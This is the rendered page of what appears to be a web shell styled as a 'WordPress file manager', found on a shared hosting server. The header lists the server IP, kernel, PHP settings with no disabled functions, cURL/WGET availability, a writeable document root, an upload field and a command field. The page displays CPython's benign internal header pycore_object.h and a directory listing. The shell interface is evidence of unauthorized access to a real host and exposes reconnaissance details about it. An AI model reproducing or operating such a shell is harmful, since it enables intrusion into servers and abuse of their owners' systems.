GRAYBYTE WORDPRESS FILE MANAGER2880

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /opt/alt/python39/include/python3.9/internal/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /opt/alt/python39/include/python3.9/internal//pycore_object.h
#ifndef Py_INTERNAL_OBJECT_H
#define Py_INTERNAL_OBJECT_H
#ifdef __cplusplus
extern "C" {
#endif

#ifndef Py_BUILD_CORE
#  error "this header requires Py_BUILD_CORE define"
#endif

#include "pycore_gc.h"         // _PyObject_GC_IS_TRACKED()
#include "pycore_interp.h"     // PyInterpreterState.gc
#include "pycore_pystate.h"    // _PyThreadState_GET()

PyAPI_FUNC(int) _PyType_CheckConsistency(PyTypeObject *type);
PyAPI_FUNC(int) _PyDict_CheckConsistency(PyObject *mp, int check_content);

/* Only private in Python 3.10 and 3.9.8+; public in 3.11 */
extern PyObject *_PyType_GetQualName(PyTypeObject *type);

/* Tell the GC to track this object.
 *
 * NB: While the object is tracked by the collector, it must be safe to call the
 * ob_traverse method.
 *
 * Internal note: interp->gc.generation0->_gc_prev doesn't have any bit flags
 * because it's not object header.  So we don't use _PyGCHead_PREV() and
 * _PyGCHead_SET_PREV() for it to avoid unnecessary bitwise operations.
 *
 * The PyObject_GC_Track() function is the public version of this macro.
 */
static inline void _PyObject_GC_TRACK_impl(const char *filename, int lineno,
                                           PyObject *op)
{
    _PyObject_ASSERT_FROM(op, !_PyObject_GC_IS_TRACKED(op),
                          "object already tracked by the garbage collector",
                          filename, lineno, "_PyObject_GC_TRACK");

    PyGC_Head *gc = _Py_AS_GC(op);
    _PyObject_ASSERT_FROM(op,
                          (gc->_gc_prev & _PyGC_PREV_MASK_COLLECTING) == 0,
                          "object is in generation which is garbage collected",
                          filename, lineno, "_PyObject_GC_TRACK");

    PyThreadState *tstate = _PyThreadState_GET();
    PyGC_Head *generation0 = tstate->interp->gc.generation0;
    PyGC_Head *last = (PyGC_Head*)(generation0->_gc_prev);
    _PyGCHead_SET_NEXT(last, gc);
    _PyGCHead_SET_PREV(gc, last);
    _PyGCHead_SET_NEXT(gc, generation0);
    generation0->_gc_prev = (uintptr_t)gc;
}

#define _PyObject_GC_TRACK(op) \
    _PyObject_GC_TRACK_impl(__FILE__, __LINE__, _PyObject_CAST(op))

/* Tell the GC to stop tracking this object.
 *
 * Internal note: This may be called while GC. So _PyGC_PREV_MASK_COLLECTING
 * must be cleared. But _PyGC_PREV_MASK_FINALIZED bit is kept.
 *
 * The object must be tracked by the GC.
 *
 * The PyObject_GC_UnTrack() function is the public version of this macro.
 */
static inline void _PyObject_GC_UNTRACK_impl(const char *filename, int lineno,
                                             PyObject *op)
{
    _PyObject_ASSERT_FROM(op, _PyObject_GC_IS_TRACKED(op),
                          "object not tracked by the garbage collector",
                          filename, lineno, "_PyObject_GC_UNTRACK");

    PyGC_Head *gc = _Py_AS_GC(op);
    PyGC_Head *prev = _PyGCHead_PREV(gc);
    PyGC_Head *next = _PyGCHead_NEXT(gc);
    _PyGCHead_SET_NEXT(prev, next);
    _PyGCHead_SET_PREV(next, prev);
    gc->_gc_next = 0;
    gc->_gc_prev &= _PyGC_PREV_MASK_FINALIZED;
}

#define _PyObject_GC_UNTRACK(op) \
    _PyObject_GC_UNTRACK_impl(__FILE__, __LINE__, _PyObject_CAST(op))

#ifdef Py_REF_DEBUG
extern void _PyDebug_PrintTotalRefs(void);
#endif

#ifdef Py_TRACE_REFS
extern void _Py_AddToAllObjects(PyObject *op, int force);
extern void _Py_PrintReferences(FILE *);
extern void _Py_PrintReferenceAddresses(FILE *);
#endif

static inline PyObject **
_PyObject_GET_WEAKREFS_LISTPTR(PyObject *op)
{
    Py_ssize_t offset = Py_TYPE(op)->tp_weaklistoffset;
    return (PyObject **)((char *)op + offset);
}

// Fast inlined version of PyType_HasFeature()
static inline int
_PyType_HasFeature(PyTypeObject *type, unsigned long feature) {
    return ((type->tp_flags & feature) != 0);
}

// Fast inlined version of PyObject_IS_GC()
static inline int
_PyObject_IS_GC(PyObject *obj)
{
    return (PyType_IS_GC(Py_TYPE(obj))
            && (Py_TYPE(obj)->tp_is_gc == NULL
                || Py_TYPE(obj)->tp_is_gc(obj)));
}

// Fast inlined version of PyType_IS_GC()
#define _PyType_IS_GC(t) _PyType_HasFeature((t), Py_TPFLAGS_HAVE_GC)

#ifdef __cplusplus
}
#endif
#endif /* !Py_INTERNAL_OBJECT_H */

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 13 2025 08:38:50
root / linksafe
0755
pegen_interface.h
0.931 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_abstract.h
0.468 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_accu.h
1.1 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_atomic.h
16.579 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_bytes_methods.h
3.305 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_byteswap.h
2.559 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_call.h
0.85 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_ceval.h
3.323 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_code.h
0.528 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_condvar.h
2.743 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_context.h
0.781 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_dtoa.h
0.631 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_fileutils.h
1.505 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_gc.h
6.491 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_getopt.h
0.479 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_gil.h
1.528 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_hamt.h
3.61 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_hashtable.h
4.099 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_import.h
0.462 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_initconfig.h
5.11 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_interp.h
5.175 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_long.h
1.512 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_object.h
4.06 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_pathconfig.h
1.891 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_pyerrors.h
1.984 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_pyhash.h
0.201 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_pylifecycle.h
3.653 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_pymem.h
3.284 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_pystate.h
3.499 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_runtime.h
4.348 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_sysmodule.h
0.535 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_traceback.h
2.984 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_tupleobject.h
0.432 KB
April 08 2025 15:21:55
root / linksafe
0644
pycore_warnings.h
0.618 KB
April 08 2025 15:21:55
root / linksafe
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF